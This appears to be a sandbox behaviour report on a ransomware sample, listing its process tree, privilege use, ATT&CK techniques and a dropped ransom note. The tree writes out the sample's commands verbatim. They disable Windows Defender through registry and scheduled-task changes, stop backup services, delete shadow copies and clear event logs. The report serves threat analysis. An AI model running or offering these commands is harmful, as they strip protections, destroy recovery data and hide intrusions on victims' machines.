Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4932	powershell.exe
4932	powershell.exe
404	powershell.exe
404	powershell.exe
532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	4916	wevtutil.exe
Token: SeBackupPrivilege	4916	wevtutil.exe
Token: SeSecurityPrivilege	2284	wevtutil.exe
Token: SeBackupPrivilege	2284	wevtutil.exe
Token: SeSecurityPrivilege	220	wevtutil.exe
Token: SeBackupPrivilege	220	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	3712	wmic.exe
Token: SeSecurityPrivilege	3712	wmic.exe
Token: SeTakeOwnershipPrivilege	3712	wmic.exe
Token: SeLoadDriverPrivilege	3712	wmic.exe
Token: SeSystemProfilePrivilege	3712	wmic.exe
Token: SeSystemtimePrivilege	3712	wmic.exe
Token: SeProfSingleProcessPrivilege	3712	wmic.exe
Token: SeIncBasePriorityPrivilege	3712	wmic.exe
Token: SeCreatePagefilePrivilege	3712	wmic.exe
Token: SeBackupPrivilege	3712	wmic.exe
Token: SeRestorePrivilege	3712	wmic.exe
Token: SeShutdownPrivilege	3712	wmic.exe
Token: SeDebugPrivilege	3712	wmic.exe
Token: SeSystemEnvironmentPrivilege	3712	wmic.exe
Token: SeRemoteShutdownPrivilege	3712	wmic.exe
Token: SeUndockPrivilege	3712	wmic.exe
Token: SeManageVolumePrivilege	3712	wmic.exe
Token: 33	3712	wmic.exe
Token: 34	3712	wmic.exe
Token: 35	3712	wmic.exe
Token: 36	3712	wmic.exe
Token: SeIncreaseQuotaPrivilege	3488	wmic.exe
Token: SeSecurityPrivilege	3488	wmic.exe
Token: SeTakeOwnershipPrivilege	3488	wmic.exe
Token: SeLoadDriverPrivilege	3488	wmic.exe
Token: SeSystemProfilePrivilege	3488	wmic.exe
Token: SeSystemtimePrivilege	3488	wmic.exe
Token: SeProfSingleProcessPrivilege	3488	wmic.exe
Token: SeIncBasePriorityPrivilege	3488	wmic.exe
Token: SeCreatePagefilePrivilege	3488	wmic.exe
Token: SeBackupPrivilege	3488	wmic.exe
Token: SeRestorePrivilege	3488	wmic.exe
Token: SeShutdownPrivilege	3488	wmic.exe
Token: SeDebugPrivilege	3488	wmic.exe
Token: SeSystemEnvironmentPrivilege	3488	wmic.exe
Token: SeRemoteShutdownPrivilege	3488	wmic.exe
Token: SeUndockPrivilege	3488	wmic.exe
Token: SeManageVolumePrivilege	3488	wmic.exe
Token: 33	3488	wmic.exe
Token: 34	3488	wmic.exe
Token: 35	3488	wmic.exe
Token: 36	3488	wmic.exe
Token: SeIncreaseQuotaPrivilege	3488	wmic.exe
Token: SeSecurityPrivilege	3488	wmic.exe
Token: SeTakeOwnershipPrivilege	3488	wmic.exe
Token: SeLoadDriverPrivilege	3488	wmic.exe
Token: SeSystemProfilePrivilege	3488	wmic.exe
Token: SeSystemtimePrivilege	3488	wmic.exe
Token: SeProfSingleProcessPrivilege	3488	wmic.exe
Token: SeIncBasePriorityPrivilege	3488	wmic.exe
Token: SeCreatePagefilePrivilege	3488	wmic.exe
Token: SeBackupPrivilege	3488	wmic.exe
Token: SeRestorePrivilege	3488	wmic.exe
Token: SeShutdownPrivilege	3488	wmic.exe
Token: SeDebugPrivilege	3488	wmic.exe
Token: SeSystemEnvironmentPrivilege	3488	wmic.exe
Token: SeRemoteShutdownPrivilege	3488	wmic.exe
Token: SeUndockPrivilege	3488	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 532 wrote to memory of 2720	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	88
PID 532 wrote to memory of 2720	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	88
PID 532 wrote to memory of 2720	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	88
PID 2720 wrote to memory of 3256	2720	net.exe	90
PID 2720 wrote to memory of 3256	2720	net.exe	90
PID 2720 wrote to memory of 3256	2720	net.exe	90
PID 532 wrote to memory of 2624	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	91
PID 532 wrote to memory of 2624	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	91
PID 532 wrote to memory of 2624	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	91
PID 2624 wrote to memory of 1920	2624	net.exe	93
PID 2624 wrote to memory of 1920	2624	net.exe	93
PID 2624 wrote to memory of 1920	2624	net.exe	93
PID 532 wrote to memory of 2920	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	94
PID 532 wrote to memory of 2920	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	94
PID 532 wrote to memory of 2920	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	94
PID 2920 wrote to memory of 4980	2920	net.exe	96
PID 2920 wrote to memory of 4980	2920	net.exe	96
PID 2920 wrote to memory of 4980	2920	net.exe	96
PID 532 wrote to memory of 2180	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	97
PID 532 wrote to memory of 2180	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	97
PID 532 wrote to memory of 2180	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	97
PID 2180 wrote to memory of 4920	2180	net.exe	99
PID 2180 wrote to memory of 4920	2180	net.exe	99
PID 2180 wrote to memory of 4920	2180	net.exe	99
PID 532 wrote to memory of 3992	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	100
PID 532 wrote to memory of 3992	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	100
PID 532 wrote to memory of 3992	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	100
PID 3992 wrote to memory of 5048	3992	net.exe	102
PID 3992 wrote to memory of 5048	3992	net.exe	102
PID 3992 wrote to memory of 5048	3992	net.exe	102
PID 532 wrote to memory of 4236	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	103
PID 532 wrote to memory of 4236	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	103
PID 532 wrote to memory of 4236	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	103
PID 4236 wrote to memory of 2548	4236	net.exe	105
PID 4236 wrote to memory of 2548	4236	net.exe	105
PID 4236 wrote to memory of 2548	4236	net.exe	105
PID 532 wrote to memory of 1756	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	106
PID 532 wrote to memory of 1756	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	106
PID 532 wrote to memory of 1756	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	106
PID 1756 wrote to memory of 1592	1756	net.exe	108
PID 1756 wrote to memory of 1592	1756	net.exe	108
PID 1756 wrote to memory of 1592	1756	net.exe	108
PID 532 wrote to memory of 2456	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	109
PID 532 wrote to memory of 2456	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	109
PID 532 wrote to memory of 2456	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	109
PID 2456 wrote to memory of 2984	2456	net.exe	111
PID 2456 wrote to memory of 2984	2456	net.exe	111
PID 2456 wrote to memory of 2984	2456	net.exe	111
PID 532 wrote to memory of 2144	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	112
PID 532 wrote to memory of 2144	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	112
PID 532 wrote to memory of 2144	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	112
PID 532 wrote to memory of 548	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	114
PID 532 wrote to memory of 548	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	114
PID 532 wrote to memory of 548	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	114
PID 532 wrote to memory of 2360	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	116
PID 532 wrote to memory of 2360	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	116
PID 532 wrote to memory of 2360	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	116
PID 532 wrote to memory of 4048	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	118
PID 532 wrote to memory of 4048	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	118
PID 532 wrote to memory of 4048	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	118
PID 532 wrote to memory of 2372	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	120
PID 532 wrote to memory of 2372	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	120
PID 532 wrote to memory of 2372	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	120
PID 532 wrote to memory of 4332	532	2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe	122

C:\Users\Admin\AppData\Local\Temp\2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe"
1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:532
- C:\Windows\SysWOW64\net.exe
  net.exe stop "SamSs" /y
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2720
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SamSs" /y
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3256
- C:\Windows\SysWOW64\net.exe
  net.exe stop "SDRSVC" /y
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2624
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SDRSVC" /y
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1920
- C:\Windows\SysWOW64\net.exe
  net.exe stop "SstpSvc" /y
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2920
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SstpSvc" /y
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4980
- C:\Windows\SysWOW64\net.exe
  net.exe stop "vmicvss" /y
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2180
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "vmicvss" /y
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4920
- C:\Windows\SysWOW64\net.exe
  net.exe stop "VSS" /y
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3992
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "VSS" /y
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5048
- C:\Windows\SysWOW64\net.exe
  net.exe stop "wbengine" /y
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4236
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "wbengine" /y
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2548
- C:\Windows\SysWOW64\net.exe
  net.exe stop "WebClient" /y
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1756
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "WebClient" /y
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1592
- C:\Windows\SysWOW64\net.exe
  net.exe stop "UnistoreSvc_2a040" /y
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2456
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "UnistoreSvc_2a040" /y
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2984
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "SamSs" start= disabled
  2⤵
  - Launches sc.exe
  PID:2144
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "SDRSVC" start= disabled
  2⤵
  - Launches sc.exe
  - System Location Discovery: System Language Discovery
  PID:548
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "SstpSvc" start= disabled
  2⤵
  - Launches sc.exe
  - System Location Discovery: System Language Discovery
  PID:2360
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "vmicvss" start= disabled
  2⤵
  - Launches sc.exe
  - System Location Discovery: System Language Discovery
  PID:4048
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "VSS" start= disabled
  2⤵
  - Launches sc.exe
  - System Location Discovery: System Language Discovery
  PID:2372
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "wbengine" start= disabled
  2⤵
  - Launches sc.exe
  - System Location Discovery: System Language Discovery
  PID:4332
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "WebClient" start= disabled
  2⤵
  - Launches sc.exe
  - System Location Discovery: System Language Discovery
  PID:4516
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "UnistoreSvc_2a040" start= disabled
  2⤵
  - Launches sc.exe
  - System Location Discovery: System Language Discovery
  PID:3784
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:4036
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4644
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender DisableAntiSpyware settings
  PID:2924
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1688
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  2⤵
  PID:3056
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - System Location Discovery: System Language Discovery
  PID:2620
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - System Location Discovery: System Language Discovery
  PID:2804
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - System Location Discovery: System Language Discovery
  PID:1968
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - System Location Discovery: System Language Discovery
  PID:2092
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - System Location Discovery: System Language Discovery
  PID:4372
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2776
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4456
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3512
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5008
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4032
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2812
- C:\Windows\SysWOW64\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2212
- C:\Windows\SysWOW64\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3468
- C:\Windows\SysWOW64\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3108
- C:\Windows\SysWOW64\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5092
- C:\Windows\SysWOW64\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3680
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3796
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2688
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1716
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2152
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5012
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3472
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  - System Location Discovery: System Language Discovery
  PID:3432
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  - System Location Discovery: System Language Discovery
  PID:856
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  - System Location Discovery: System Language Discovery
  PID:3652
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  - System Location Discovery: System Language Discovery
  PID:3508
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies security service
  - System Location Discovery: System Language Discovery
  PID:4200
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  - System Location Discovery: System Language Discovery
  PID:1056
- C:\Windows\SysWOW64\wevtutil.exe
  wevtutil.exe cl system
  2⤵
  - Clears Windows event logs
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4916
- C:\Windows\SysWOW64\wevtutil.exe
  wevtutil.exe cl security
  2⤵
  - Clears Windows event logs
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:2284
- C:\Windows\SysWOW64\wevtutil.exe
  wevtutil.exe cl application
  2⤵
  - Clears Windows event logs
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:220
- C:\Windows\SysWOW64\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:3712
- C:\Windows\SysWOW64\Wbem\wmic.exe
  wmic.exe shadowcopy delete
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:3488
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3632
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2384
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableIOAVProtection $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4932
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3112
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableRealtimeMonitoring $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:404

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Common Files\DESIGNER\pK8K_HOW_TO_DECRYPT.txt

Filesize
1KB

MD5
9a85ef171a3182928e879bda7d95fd5c

SHA1
a6d05725bfd9cbbdaaf00e852db758f8079b7b61

SHA256
0139e27268b1e24ffa81147d9e8660f6eec2b162ab930a45469dccbc1ff31024

SHA512
5b4042e90b5d802e89d6073e7a2fd0994c854af86d0bbd5c40f36b4162217a83aa9a1142ccb4cface094e63f26ba7f8d6bec3870bca8a6587b1d72e4394eaa58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
